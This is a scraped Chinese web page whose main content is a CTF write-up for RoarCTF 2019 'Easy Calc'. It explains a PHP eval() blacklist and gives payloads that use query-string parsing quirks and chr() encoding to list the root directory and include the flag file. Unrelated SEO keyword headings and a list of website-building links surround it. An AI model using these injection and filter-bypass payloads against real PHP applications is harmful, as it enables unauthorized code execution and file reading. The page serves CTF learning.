当前位置: 首页 > news >正文

成都做网站的公司建设刷会员网站

成都做网站的公司,建设刷会员网站,白酒公司网站的建设,app开发网站建设哪家好题目 进入页面是一个计算器的页面 随便试了一下 查看源代码看看有什么有用的信息 访问一下这个calc.php 进行代码审计 ?php error_reporting(0); if(!isset($_GET[num])){show_source(__FILE__); }else{$str $_GET[num];$blacklist [ , \t, \r, \n,\, , , \[, \]…题目 进入页面是一个计算器的页面 随便试了一下 查看源代码看看有什么有用的信息 访问一下这个calc.php 进行代码审计 ?php error_reporting(0); if(!isset($_GET[num])){show_source(__FILE__); }else{$str $_GET[num];$blacklist [ , \t, \r, \n,\, , , \[, \],\$,\\,\^];//黑名单传入参数numeval()函数进行代码执行会对输入的字符进行拦截根据源代码中的提示可知有waf对输入参数进行了过滤foreach ($blacklist as $blackitem) {if (preg_match(/ . $blackitem . /m, $str)) {die(what are you want to do?);}}eval(echo .$str.;); } ? 这里利用到了php的字符串解析特性还有两个函数scandir()和var_dump()函数 由上述代码审计可知拦截了“/”可以尝试使用chr来绕过黑名单 这里chr()是1-255的整数数字对应的是ascii值chr(47)等价于“/” 构造payload /calc.php?%20numvar_dump(scandir(chr(47))) 可得 知道了文件名为f1agg 构造payload /calc.php?%20numvar_dump(include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) 得到flag 总结 1.php的字符串解析特性 我们知道PHP将查询字符串在URL或正文中转换为内部GET或的关联数组_POST。例如/?foobar变成Array([foo] “bar”)。值得注意的是查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如/?%20news[id%0042会转换为Array([news_id] 42) 2.scandir()函数 3.var_dump()函数 参考文章链接 [复现] [RoarCTF 2019]Easy Calc-腾讯云开发者社区-腾讯云
http://www.dnsts.com.cn/news/218463.html

相关文章:

  • 山东定制网站建设公司服务器调用wordpress
  • 怎么向搜索引擎提交网站汽车网新车报价大全
  • 文化传播公司网站模板刚开始做网站哪有免费空间
  • 做微信小程序和做网站婚纱网站html源码
  • 黑色网站贵阳网站建设q479185700棒
  • 女人做绿叶网站相亲拉人佛山企业网站多少钱
  • wordpress软件网站模板下载失败杭州建网站的公司
  • 网站建设都用哪些软件浙里建官方网站
  • 宁波网站建设网络推广济南哪里做网站好
  • 网站建设的建议和意见爱客crm软件
  • 有没有做网站的教程广州高端网页制作
  • 工程建设项目网站企业网站建设情况说明
  • 做一个什么样的网站某旅行社网站建设规划书
  • 网站建设经营范围怎么写外贸网站推广 sit
  • 网上做效果图网站一级域名生成二级域名
  • 企业网站建设的类型主要有wordpress手机端
  • ps网站设计怎么做中国未来巨型空间站
  • 订阅号做影视网站广东省建设工程质量安全监督检测总站网站
  • 开发网站需要哪些技术室内设计多久能学出来
  • 程序员自己建站赚钱wordpress域名授权破解版
  • 网站快速排名互点软件永久网站建设
  • 凡科建设网站别人能进去么大连零基础网站建设培训中心
  • 网站建设多少钱比较合适免费 网站 手机
  • 设计图片用什么软件好信阳seo公司
  • 凤冈县住房和城乡建设局网站枸杞网站建设方案
  • 提供企业网站建设价格建网站流程 知乎
  • 影视制作做的好的有什么网站网站怎么建
  • 网站老域名跳转到新域名网站设计论文开题报告
  • 村级网站建设 不断增强网站服务器和网站
  • 如何增加网站的外链企业免费邮箱注册申请